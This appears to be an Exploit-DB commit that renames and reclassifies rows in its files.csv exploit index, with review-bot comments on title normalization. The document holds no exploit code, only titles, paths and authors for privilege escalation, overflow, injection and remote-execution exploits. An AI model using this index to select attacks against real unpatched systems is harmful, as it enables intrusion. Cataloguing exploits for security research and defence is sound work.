DB: 2017-01-31

39 new exploits

OpenSSL 1.1.0 - Remote Client Denial of Service

CDRTools CDRecord 2.0 - Mandrake Privilege Escalation
CDRTools CDRecord 2.0 (Mandrake / Slackware) - Privilege Escalation

RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation Exploit
RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation
BitchX 1.0c19 - Privilege Escalation (suid?)
Apache 1.3.31 (mod_include) - Local Buffer Overflow
BitchX 1.0c19 - Privilege Escalation
Apache 1.3.31 mod_include - Local Buffer Overflow

AIX 4.3/5.1 < 5.3 - lsmcode Command Execution Privilege Escalation
AIX 4.3/5.1 < 5.3 - 'lsmcode' Command Execution Privilege Escalation

Debian 2.2 - /usr/bin/pileup Privilege Escalation
Debian 2.2 /usr/bin/pileup - Privilege Escalation

Oracle 10g (Windows x86) - (PROCESS_DUP_HANDLE) Local Privilege Elevation

GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow

Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow

IBM AIX 5.3 sp6 - ftp gets() Privilege Escalation
IBM AIX 5.3 SP6 - FTP gets() Privilege Escalation

IBM AIX 5.3.0 - setlocale() Privilege Escalation
IBM AIX 5.3.0 - 'setlocale()' Privilege Escalation

FreeBSD 6x/7 - protosw kernel Local Privilege Escalation Exploit
FreeBSD 6x/7 protosw Kernel - Privilege Escalation

PHP 5.2.9 (Windows x86) - Local Safemod Bypass Exploit

HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow

(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - xattr Privilege Escalation
(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - 'xattr' Privilege Escalation

Linux Kernel 4.6.3 - 'Netfilter' Privilege Escalation (Metasploit)
Linux Kernel 4.6.3 (x86) - 'Netfilter' Privilege Escalation (Metasploit)

FreeBSD 6.4 - Netgraph Local Privilege Escalation Exploit
FreeBSD 6.4 - Netgraph Privilege Escalation

PHP 5.4.3 (Windows x86 Polish) - Code Execution

Apache (Mod_Auth_OpenID) - Session Stealing
Apache Mod_Auth_OpenID - Session Stealing

cPanel 5.0 - Openwebmail Privilege Escalation
cPanel 5.0 - 'Openwebmail' Privilege Escalation
Apache 2.0.4x (mod_php) - File Descriptor Leakage (1)
Apache 2.0.4x (mod_php) - File Descriptor Leakage (2)
Apache 2.0.4x mod_php - File Descriptor Leakage (1)
Apache 2.0.4x mod_php - File Descriptor Leakage (2)

Apache 2.0.4x (mod_perl) - File Descriptor Leakage (3)
Apache 2.0.4x mod_perl - File Descriptor Leakage (3)

cPanel 5-9 - Privilege Escalation
cPanel 5 < 9 - Privilege Escalation

Apache 1.3.x (mod_include) - Local Buffer Overflow
Apache 1.3.x mod_include - Local Buffer Overflow

IBM AIX 5.x - Diag Privilege Escalation Vulnerabilities
IBM AIX 5.x - 'Diag' Privilege Escalation

Nginx (Debian-Based + Gentoo) - 'logrotate' Local Privilege Escalation
Nginx (Debian-Based Distros + Gentoo) - 'logrotate' Privilege Escalation

Amanda 3.3.1 - amstar Command Injection Privilege Escalation
Amanda 3.3.1 - 'amstar' Command Injection Privilege Escalation
Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1)
Deepin Linux 15 - lastore-daemon Privilege Escalation
Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1)
Deepin Linux 15 - 'lastore-daemon' Privilege Escalation

Microsoft Windows - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)
Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)

Microsoft Windows 7 (x64) - 'afd.sys' Privilege Escalation (MS14-040)
Microsoft Windows 7 (x64) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)

Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)

Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation

Microsoft Windows (x86) - 'afd.sys' Privilege Escalation (MS11-046)

Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit)
Allwinner 3.4 Legacy Kernel - Privilege Escalation (Metasploit)

Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)

MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition
MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('mysql' System User) Privilege Escalation / Race Condition

MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation
MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('root' System User) Privilege Escalation

Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Privilege Escalation (Metasploit)

Apache CouchDB 2.0.0 - Local Privilege Escalation
Apache CouchDB 2.0.0 - Privilege Escalation

Vesta Control Panel 0.9.8-16 - Local Privilege Escalation
Vesta Control Panel 0.9.8-16 - Privilege Escalation

Systemd 228 - Privilege Escalation (PoC)
Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Privilege Escalation (PoC)

Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Privilege Escalation (PoC)

Apache 1.3.x (mod_mylo) - Remote Code Execution
Apache 1.3.x mod_mylo - Remote Code Execution

Apache 1.3.x < 2.0.48 (mod_userdir) - Remote Users Disclosure
Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure

Microsoft Windows (x86) - Metafile '.emf' Heap Overflow (MS04-032)

Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit (2)
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Exploit

Veritas NetBackup 6.0 (Windows x86) - (bpjava-msvc) Remote Exploit

Apache (mod_rewrite) (Windows x86) - Off-by-One Remote Overflow
Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow

3proxy 0.5.3g (Windows x86) - proxy.c logurl() Remote Buffer Overflow

Apache (mod_rewrite) 2.0.58 (Windows 2003) - Remote Overflow
Apache 2.0.58 mod_rewrite (Windows 2003) - Remote Overflow

Apache Tomcat Connector (mod_jk) - Remote Exploit (exec-shield)
Apache Tomcat Connector mod_jk - 'exec-shield' Remote Exploit

3proxy 0.5.3g (Windows x86) - logurl() Remote Buffer Overflow (Perl)

SapLPD 6.28 (Windows x86) - Remote Buffer Overflow

Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow

Apache Tomcat Connector jk2-2.0.2 (mod_jk2) - Remote Overflow
Apache Tomcat Connector jk2-2.0.2 mod_jk2 - Remote Overflow

Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow

Apache (mod_perl) - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting
Apache mod_perl - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting

Apache 2.2.14 (mod_isapi) - Dangling Pointer Remote SYSTEM Exploit
Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit

Apache (mod_proxy) - Reverse Proxy Exposure (PoC)
Apache mod_proxy - Reverse Proxy Exposure (PoC)

Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit (1)
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Exploit

Apache 2.2.6 (mod_negotiation) - HTML Injection and HTTP Response Splitting
Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting

Apache 7.0.x (mod_proxy) - Reverse Proxy Security Bypass
Apache 7.0.x mod_proxy - Reverse Proxy Security Bypass

Apache 2.2.15 (mod_proxy) - Reverse Proxy Security Bypass
Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass

Apache (mod_wsgi) - Information Disclosure
Apache mod_wsgi - Information Disclosure

Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution Exploit
Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution

phpGraphy 0.9.12 - Privilege Escalation / Commands Execution Exploit
phpGraphy 0.9.12 - Privilege Escalation / Commands Execution

PEAR 1.9.0 - Multiple Remote File Inclusion
PHP PEAR 1.9.0 - Multiple Remote File Inclusion

Pear HTTP_Upload 1.0.0b3 - Arbitrary File Upload
PHP PEAR HTTP_Upload 1.0.0b3 - Arbitrary File Upload

Radisys MRF - Command Injection
PHP PEAR 1.10.1 - Arbitrary File Download
Caregiver Script 2.57 - SQL Injection
Auction Script 6.49 - SQL Injection
Itech B2B Script 4.28 - SQL Injection
Itech Classifieds Script 7.27 - 'scat' Parameter SQL Injection
Itech Dating Script 3.26 - SQL Injection
Itech Freelancer Script 5.13 - SQL Injection
Itech Multi Vendor Script 6.49 - SQL Injection
Itech News Portal Script 6.28 - SQL Injection
Itech Real Estate Script 3.12 - SQL Injection
PHP Product Designer Script - Arbitrary File Upload
PHP Logo Designer Script - Arbitrary File Upload
Video Sharing Script 4.94 - SQL Injection
HelpDeskZ < 1.0.2 - Authenticated SQL Injection / Unauthorized File Download
Itech Classifieds Script 7.27 - 'pid' Parameter SQL Injection
Itech Dating Script 3.26 - 'send_gift.php' SQL Injection
Itech Real Estate Script 3.12 - 'id' Parameter SQL Injection
Offensive Security 2017-01-31 05:01:15 +00:00
parent 6df10a3616
commit bf6526a40b
41 changed files with 1323 additions and 70 deletions

files.csv

@ -5348,13 +5348,14 @@ id,file,description,date,author,platform,type,port
41163,platforms/multiple/dos/41163.txt,"macOS 10.12.1 / iOS 10.2 - Kernel Userspace Pointer Memory Corruption",2017-01-26,"Google Security Research",multiple,dos,0
41164,platforms/multiple/dos/41164.c,"macOS 10.12.1 / iOS Kernel - 'IOService::matchPassive' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0
41165,platforms/multiple/dos/41165.c,"macOS 10.12.1 / iOS Kernel - 'host_self_trap' Use-After-Free",2017-01-26,"Google Security Research",multiple,dos,0
41192,platforms/multiple/dos/41192.c,"OpenSSL 1.1.0 - Remote Client Denial of Service",2017-01-26,"Guido Vranken",multiple,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
15,platforms/osx/local/15.c,"Apple Mac OSX 10.2.4 - DirectoryService (PATH) Privilege Escalation",2003-04-18,"Neeko Oni",osx,local,0
21,platforms/linux/local/21.c,"Qpopper 4.0.x - poppassd Privilege Escalation",2003-04-29,Xpl017Elz,linux,local,0
29,platforms/bsd/local/29.c,"Firebird 1.0.2 FreeBSD 4.7-RELEASE - Privilege Escalation",2003-05-12,bob,bsd,local,0
31,platforms/linux/local/31.pl,"CDRTools CDRecord 2.0 - Mandrake Privilege Escalation",2003-05-14,anonymous,linux,local,0
31,platforms/linux/local/31.pl,"CDRTools CDRecord 2.0 (Mandrake / Slackware) - Privilege Escalation",2003-05-14,anonymous,linux,local,0
32,platforms/windows/local/32.c,"Microsoft Windows XP - 'explorer.exe' Buffer Overflow",2003-05-21,einstein,windows,local,0
40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 /usr/mail - Local Exploit",2003-06-10,anonymous,linux,local,0
52,platforms/windows/local/52.asm,"ICQ Pro 2003a - Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0
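Review bot: the new row 41192 names only "OpenSSL 1.1.0" with no bound on the affected versions, where other rows in this file express a range (the "Linux Kernel < 2.4.20" row in this same hunk); if the issue does not apply to every 1.1.0 letter release, the description should carry that bound. "Remote Client Denial of Service" is also ambiguous about which side crashes; wording such as "Client-Side Denial of Service" would state the direction a reader filtering this CSV needs.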
@ -5395,7 +5396,7 @@ id,file,description,date,author,platform,type,port
200,platforms/bsd/local/200.c,"BSDi SUIDPerl - Local Stack Buffer Overflow",2000-11-21,vade79,bsd,local,0
202,platforms/bsd/local/202.c,"BSDi 3.0 / 4.0 - rcvtty[mh] Local Exploit",2000-11-21,vade79,bsd,local,0
203,platforms/linux/local/203.sh,"vixie-cron - Privilege Escalation",2000-11-21,"Michal Zalewski",linux,local,0
205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation Exploit",2000-11-29,Tlabs,linux,local,0
205,platforms/linux/local/205.pl,"RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation",2000-11-29,Tlabs,linux,local,0
206,platforms/linux/local/206.c,"dump 0.4b15 (RedHat 6.2) - Exploit",2000-11-29,mat,linux,local,0
207,platforms/bsd/local/207.c,"BSDi 3.0 inc - Buffer Overflow Privilege Escalation",2000-11-30,vade79,bsd,local,0
209,platforms/linux/local/209.c,"GLIBC (via /bin/su) - Privilege Escalation",2000-11-30,localcore,linux,local,0
@ -5484,8 +5485,8 @@ id,file,description,date,author,platform,type,port
559,platforms/windows/local/559.c,"Zinf Audio Player 2.2.1 - Local Buffer Overflow",2004-09-28,Delikon,windows,local,0
560,platforms/windows/local/560.txt,"GlobalScape - CuteFTP macros (.mcr) Local",2004-09-28,ATmaCA,windows,local,0
579,platforms/bsd/local/579.sh,"BSD bmon 1.2.1_2 - Local Exploit",2004-10-16,"Idan Nahoum",bsd,local,0
586,platforms/linux/local/586.c,"BitchX 1.0c19 - Privilege Escalation (suid?)",2004-10-20,Sha0,linux,local,0
587,platforms/linux/local/587.c,"Apache 1.3.31 (mod_include) - Local Buffer Overflow",2004-10-21,xCrZx,linux,local,0
586,platforms/linux/local/586.c,"BitchX 1.0c19 - Privilege Escalation",2004-10-20,Sha0,linux,local,0
587,platforms/linux/local/587.c,"Apache 1.3.31 mod_include - Local Buffer Overflow",2004-10-21,xCrZx,linux,local,0
591,platforms/linux/local/591.c,"socat 1.4.0.2 - Local Format String (not setuid)",2004-10-23,CoKi,linux,local,0
600,platforms/linux/local/600.c,"GD Graphics Library - Heap Overflow (PoC)",2004-10-26,anonymous,linux,local,0
601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp - Remote Buffer Overflow (PoC)",2004-10-26,infamous41md,linux,local,0
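Review bot: dropping "(suid?)" from row 586 removes the author's own flag that the BitchX exploit only escalates privilege when the binary is installed setuid, which is exactly the precondition a reader filtering this CSV for local privilege escalation needs; keep the qualifier in a normalized form, for example "BitchX 1.0c19 (setuid) - Privilege Escalation", rather than asserting privilege escalation unconditionally.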
@ -5500,7 +5501,7 @@ id,file,description,date,author,platform,type,port
695,platforms/linux/local/695.c,"Cscope 15.5 - Symlink Exploit",2004-12-17,Gangstuck,linux,local,0
698,platforms/ultrix/local/698.c,"Ultrix 4.5/MIPS - dxterm 0 Local Buffer Overflow",2004-12-20,"Kristoffer Brånemyr",ultrix,local,0
699,platforms/aix/local/699.c,"AIX 5.1 < 5.3 - paginit Local Stack Overflow",2004-12-20,cees-bart,aix,local,0
701,platforms/aix/local/701.sh,"AIX 4.3/5.1 < 5.3 - lsmcode Command Execution Privilege Escalation",2004-12-21,cees-bart,aix,local,0
701,platforms/aix/local/701.sh,"AIX 4.3/5.1 < 5.3 - 'lsmcode' Command Execution Privilege Escalation",2004-12-21,cees-bart,aix,local,0
713,platforms/solaris/local/713.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (1)",2004-12-24,"Marco Ivaldi",solaris,local,0
714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (2)",2004-12-24,"Marco Ivaldi",solaris,local,0
715,platforms/solaris/local/715.c,"Solaris 8/9 - passwd circ() Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0
@ -5596,7 +5597,7 @@ id,file,description,date,author,platform,type,port
1154,platforms/linux/local/1154.pl,"Operator Shell (osh) 1.7-13 - Privilege Escalation",2005-08-16,"Charles Stevenson",linux,local,0
1161,platforms/windows/local/1161.c,"BakBone NetVault 7.1 - Privilege Escalation",2005-04-27,"Reed Arvin",windows,local,0
1168,platforms/windows/local/1168.c,"WinAce 2.6.0.5 - Temporary File Parsing Buffer Overflow",2005-08-19,ATmaCA,windows,local,0
1170,platforms/linux/local/1170.c,"Debian 2.2 - /usr/bin/pileup Privilege Escalation",2001-07-13,"Charles Stevenson",linux,local,0
1170,platforms/linux/local/1170.c,"Debian 2.2 /usr/bin/pileup - Privilege Escalation",2001-07-13,"Charles Stevenson",linux,local,0
1173,platforms/windows/local/1173.c,"Mercora IMRadio 4.0.0.0 - Local Password Disclosure",2005-08-22,Kozan,windows,local,0
1174,platforms/windows/local/1174.c,"ZipTorrent 1.3.7.3 - Local Proxy Password Disclosure",2005-08-22,Kozan,windows,local,0
1181,platforms/linux/local/1181.c,"MySQL 4.0.17 (Linux) - User-Defined Function (UDF) Dynamic Library Exploit (1)",2004-12-24,"Marco Ivaldi",linux,local,0
@ -5770,7 +5771,7 @@ id,file,description,date,author,platform,type,port
3439,platforms/windows/local/3439.php,"PHP 4.4.6 - snmpget() object id Local Buffer Overflow (PoC)",2007-03-09,rgod,windows,local,0
3440,platforms/linux/local/3440.php,"PHP 5.2.0 / PHP with PECL ZIP 1.8.3 - zip:// URL Wrapper Buffer Overflow",2007-03-09,"Stefan Esser",linux,local,0
3442,platforms/multiple/local/3442.php,"PHP 4.4.6 - cpdf_open() Local Source Code Disclosure (PoC)",2007-03-09,rgod,multiple,local,0
3451,platforms/windows/local/3451.c,"Oracle 10g (Windows x86) - (PROCESS_DUP_HANDLE) Local Privilege Elevation",2007-03-10,"Cesar Cerrudo",windows,local,0
3451,platforms/win_x86/local/3451.c,"Oracle 10g (Windows x86) - (PROCESS_DUP_HANDLE) Local Privilege Elevation",2007-03-10,"Cesar Cerrudo",win_x86,local,0
3460,platforms/osx/local/3460.php,"PHP 5.2.0 (OSX) - EXT/Filter Space Trimming Buffer Underflow Exploit",2007-03-12,"Stefan Esser",osx,local,0
3479,platforms/linux/local/3479.php,"PHP 5.2.1 - session_regenerate_id() Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 - Rejected Session ID Double-Free Exploit",2007-03-14,"Stefan Esser",linux,local,0
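Review bot: row 3451 changes both the platform column and the file path (platforms/windows/local/3451.c to platforms/win_x86/local/3451.c), so the .c file itself must move in this commit or the CSV will point at a path that no longer exists; the commit message lists only title changes and does not mention this reclassification, and the same check applies to the win_x86 moves of 3888, 3912, 8799, 11112 and 18861 in later hunks. Separately, this row keeps "Local Privilege Elevation" while the rest of the commit normalizes such suffixes to "Privilege Escalation".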
@ -5812,9 +5813,9 @@ id,file,description,date,author,platform,type,port
3812,platforms/windows/local/3812.c,"Photoshop CS2/CS3 / Paint Shop Pro 11.20 - '.png' Buffer Overflow",2007-04-27,Marsu,windows,local,0
3823,platforms/windows/local/3823.c,"Winamp 5.34 - '.mp4' Code Execution",2007-04-30,Marsu,windows,local,0
3856,platforms/windows/local/3856.htm,"East Wind Software - 'advdaudio.ocx 1.5.1.1' Local Buffer Overflow",2007-05-05,shinnai,windows,local,0
3888,platforms/windows/local/3888.c,"GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",windows,local,0
3888,platforms/win_x86/local/3888.c,"GIMP 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow",2007-05-09,"Kristian Hermansen",win_x86,local,0
3897,platforms/windows/local/3897.c,"eTrust AntiVirus Agent r8 - Local Privilege Elevation Exploit",2007-05-11,binagres,windows,local,0
3912,platforms/windows/local/3912.c,"Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow",2007-05-12,vade79,windows,local,0
3912,platforms/win_x86/local/3912.c,"Notepad++ 4.1 (Windows x86) - '.ruby' File Processing Buffer Overflow",2007-05-12,vade79,win_x86,local,0
3975,platforms/windows/local/3975.c,"MagicISO 5.4 (build239) - '.cue' File Local Buffer Overflow",2007-05-23,vade79,windows,local,0
3985,platforms/osx/local/3985.txt,"Apple Mac OSX 10.4.8 - pppd Plugin Loading Privilege Escalation",2007-05-25,qaaz,osx,local,0
4001,platforms/windows/local/4001.cpp,"UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (1)",2007-05-28,n00b,windows,local,0
@ -5834,7 +5835,7 @@ id,file,description,date,author,platform,type,port
4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",windows,local,0
4231,platforms/aix/local/4231.c,"IBM AIX 5.3 sp6 - capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,aix,local,0
4232,platforms/aix/local/4232.sh,"IBM AIX 5.3 sp6 - pioout Arbitrary Library Loading Privilege Escalation",2007-07-27,qaaz,aix,local,0
4233,platforms/aix/local/4233.c,"IBM AIX 5.3 sp6 - ftp gets() Privilege Escalation",2007-07-27,qaaz,aix,local,0
4233,platforms/aix/local/4233.c,"IBM AIX 5.3 SP6 - FTP gets() Privilege Escalation",2007-07-27,qaaz,aix,local,0
4236,platforms/windows/local/4236.php,"PHP 5.x - (Win32service) Local Safe Mode Bypass Exploit",2007-07-27,NetJackal,windows,local,0
4252,platforms/windows/local/4252.c,"Live for Speed S1/S2/Demo - '.mpr replay' Buffer Overflow",2007-08-01,n00b,windows,local,0
4257,platforms/windows/local/4257.c,"Panda AntiVirus 2008 - Privilege Escalation",2007-08-05,tarkus,windows,local,0
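Review bot: row 4233 is normalized to "IBM AIX 5.3 SP6" and "FTP", but rows 4231 and 4232 two lines above (unchanged context) still read "IBM AIX 5.3 sp6", so three adjacent entries by the same author for the same platform now disagree on capitalization; normalize all three in one pass.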
@ -5866,7 +5867,7 @@ id,file,description,date,author,platform,type,port
4572,platforms/multiple/local/4572.txt,"Oracle 10g - LT.FINDRICSET SQL Injection (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0
4583,platforms/windows/local/4583.py,"Sony CONNECT Player 4.x - '.m3u' Local Stack Overflow",2007-10-29,TaMBaRuS,windows,local,0
4584,platforms/windows/local/4584.c,"Kodak Image Viewer - TIF/TIFF Code Execution (PoC) (MS07-055)",2007-10-29,"Gil-Dong / Woo-Chi",windows,local,0
4612,platforms/aix/local/4612.py,"IBM AIX 5.3.0 - setlocale() Privilege Escalation",2007-11-07,"Thomas Pollet",aix,local,0
4612,platforms/aix/local/4612.py,"IBM AIX 5.3.0 - 'setlocale()' Privilege Escalation",2007-11-07,"Thomas Pollet",aix,local,0
4625,platforms/windows/local/4625.txt,"Microsoft Jet Engine - '.MDB' File Parsing Stack Overflow (PoC)",2007-11-16,cocoruder,windows,local,0
4698,platforms/linux/local/4698.c,"Send ICMP Nasty Garbage (sing) - Append File Logrotate Exploit",2007-12-06,bannedit,linux,local,0
4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 - '.MP4' File Stack Overflow",2007-12-08,"SYS 49152",windows,local,0
@ -5958,7 +5959,7 @@ id,file,description,date,author,platform,type,port
7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python)",2008-12-22,Encrypt3d.M!nd,windows,local,0
7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - Privilege Escalation",2008-12-22,"Jon Oberheide",multiple,local,0
7577,platforms/windows/local/7577.pl,"Acoustica Mixcraft 4.2 - Universal Stack Overflow (SEH)",2008-12-24,SkD,windows,local,0
7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 - protosw kernel Local Privilege Escalation Exploit",2008-12-28,"Don Bailey",freebsd,local,0
7581,platforms/freebsd/local/7581.c,"FreeBSD 6x/7 protosw Kernel - Privilege Escalation",2008-12-28,"Don Bailey",freebsd,local,0
7582,platforms/windows/local/7582.py,"IntelliTamper 2.07/2.08 - '.map' Local Overwrite (SEH)",2008-12-28,Cnaph,windows,local,0
7608,platforms/windows/local/7608.py,"IntelliTamper 2.07/2.08 - (ProxyLogin) Local Stack Overflow",2008-12-29,His0k4,windows,local,0
7618,platforms/linux/local/7618.c,"Linux Kernel < 2.6.26.4 - SCTP Kernel Memory Disclosure",2008-12-29,"Jon Oberheide",linux,local,0
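Review bot: the rename of row 7581 moves "protosw Kernel" into the product field but leaves "6x", which is not the "N.x" form used for version wildcards elsewhere in this file ("IBM AIX 5.x", "Apache 1.3.x"); "FreeBSD 6.x/7 protosw Kernel - Privilege Escalation" would match the convention.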
@ -6111,7 +6112,7 @@ id,file,description,date,author,platform,type,port
8782,platforms/windows/local/8782.txt,"ArcaVir 2009 < 9.4.320X.9 - 'ps_drv.sys' Privilege Escalation",2009-05-26,"NT Internals",windows,local,0
8783,platforms/windows/local/8783.c,"Winamp 5.551 - MAKI Parsing Integer Overflow",2009-05-26,n00b,windows,local,0
8789,platforms/windows/local/8789.py,"Slayer 2.4 - (skin) Universal Buffer Overflow (SEH)",2009-05-26,SuNHouSe2,windows,local,0
8799,platforms/windows/local/8799.txt,"PHP 5.2.9 (Windows x86) - Local Safemod Bypass Exploit",2009-05-26,Abysssec,windows,local,0
8799,platforms/win_x86/local/8799.txt,"PHP 5.2.9 (Windows x86) - Local Safemod Bypass Exploit",2009-05-26,Abysssec,win_x86,local,0
8833,platforms/hardware/local/8833.txt,"Linksys WAG54G2 - Web Management Console Arbitrary Command Execution",2009-06-01,Securitum,hardware,local,0
8863,platforms/windows/local/8863.c,"Atomix Virtual Dj Pro 6.0 - Stack Buffer Overflow PoC (SEH)",2009-06-03,"fl0 fl0w",windows,local,0
8875,platforms/windows/local/8875.txt,"Online Armor < 3.5.0.12 - 'OAmon.sys' Privilege Escalation",2009-06-04,"NT Internals",windows,local,0
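Review bot: row 8799 changes platform to win_x86 but leaves the description "Local Safemod Bypass Exploit", whereas this commit drops trailing "Exploit" and the "Local" prefix from other local entries, and row 4236 in an earlier hunk spells the same feature "Safe Mode Bypass"; suggest "PHP 5.2.9 (Windows x86) - Safe Mode Bypass".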
@ -6346,7 +6347,7 @@ id,file,description,date,author,platform,type,port
11079,platforms/windows/local/11079.rb,"Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Buffer Overflow",2010-01-10,"Sébastien Duquette",windows,local,0
11093,platforms/windows/local/11093.rb,"Soritong 1.0 - Universal Buffer Overflow SEH (Metasploit)",2010-01-10,fb1h2s,windows,local,0
11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 - '.pls' Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local,0
11112,platforms/windows/local/11112.c,"HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow",2010-01-11,"fl0 fl0w",windows,local,0
11112,platforms/win_x86/local/11112.c,"HTMLDOC 1.9.x-r1629 (Windows x86) - Local .html Buffer Overflow",2010-01-11,"fl0 fl0w",win_x86,local,0
11139,platforms/windows/local/11139.c,"Winamp 5.05 < 5.13 - '.ini' Local Stack Buffer Overflow (PoC)",2010-01-14,"fl0 fl0w",windows,local,0
11146,platforms/windows/local/11146.py,"BS.Player 2.51 - Overwrite (SEH)",2010-01-15,"Mert SARICA",windows,local,0
11152,platforms/windows/local/11152.py,"Google SketchUp 7.1.6087 - 'lib3ds' 3DS Importer Memory Corruption",2010-01-16,mr_me,windows,local,0
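Review bot: row 11112 keeps the unquoted ".html" in "Local .html Buffer Overflow" while the extension in row 11139 two lines below ('.ini') and in the renamed 3888 and 3912 rows ('.ras', '.ruby') is quoted; "HTMLDOC 1.9.x-r1629 (Windows x86) - '.html' Buffer Overflow" would follow the convention, and the "Local" prefix is redundant with the local type column.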
@ -6422,7 +6423,7 @@ id,file,description,date,author,platform,type,port
12090,platforms/freebsd/local/12090.txt,"McAfee Email Gateway (formerly IronMail) - Privilege Escalation",2010-04-06,"Nahuel Grisolia",freebsd,local,0
12091,platforms/freebsd/local/12091.txt,"McAfee Email Gateway (formerly IronMail) - Internal Information Disclosure",2010-04-06,"Nahuel Grisolia",freebsd,local,0
12103,platforms/multiple/local/12103.txt,"Local Glibc shared library (.so) 2.11.1 - Exploit",2010-04-07,Rh0,multiple,local,0
12130,platforms/linux/local/12130.py,"(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - xattr Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0
12130,platforms/linux/local/12130.py,"(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - 'xattr' Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0
12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0
12213,platforms/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Privilege Escalation",2010-04-14,MJ0011,windows,local,0
20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,local,0
@ -6694,7 +6695,7 @@ id,file,description,date,author,platform,type,port
16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0
16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0
